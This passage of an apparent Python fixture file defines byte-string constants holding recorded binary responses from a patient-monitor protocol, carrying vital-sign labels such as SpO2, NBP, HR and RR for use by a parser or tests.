b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ 
b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ 
b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_1_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ 
b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x7f\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ 
b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_1_no_3 = \ b"\xe1\x00\x00\x02\x00\x02\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21" \ b"\x00\x00\x00\x00\xf1\x3b\x00\x1a\x00\x01\x00\x00\x0e\x7f\xaf\x00" \ b"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00" \ b"\x00\x00" rsp_wave_1_no_1 = \ b"\xe1\x00\x00\x02\x00\x02\x00\x30\x00\x04\x00\x07\x00\x2a\x00\x21" \ b"\x00\x00\x00\x00\xf1\x3b\x00\x20\x00\x03\x00\x00\x0e\x7f\xaf\x00" \ b"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01" \ b"\x00\x06\x00\x00\x00\x00\x00\x00" # second group of responses rsp_nu_2_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ 
b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ 
b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_2_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ 
b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ 
b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_2_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_2_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\xde\x00\x04\x00\x07\x00\xd8\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\xce\x00\x03\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x00\xb4\x00\x00\x00\x01" \ b"\x00\xae\x08\x11\x00\x0f\x00\xa8\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x02\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x44\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xdd\x20\xa5\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\xb1\x21\xd1" # third group of responses rsp_nu_3_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ 
b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x0f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ 
b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ 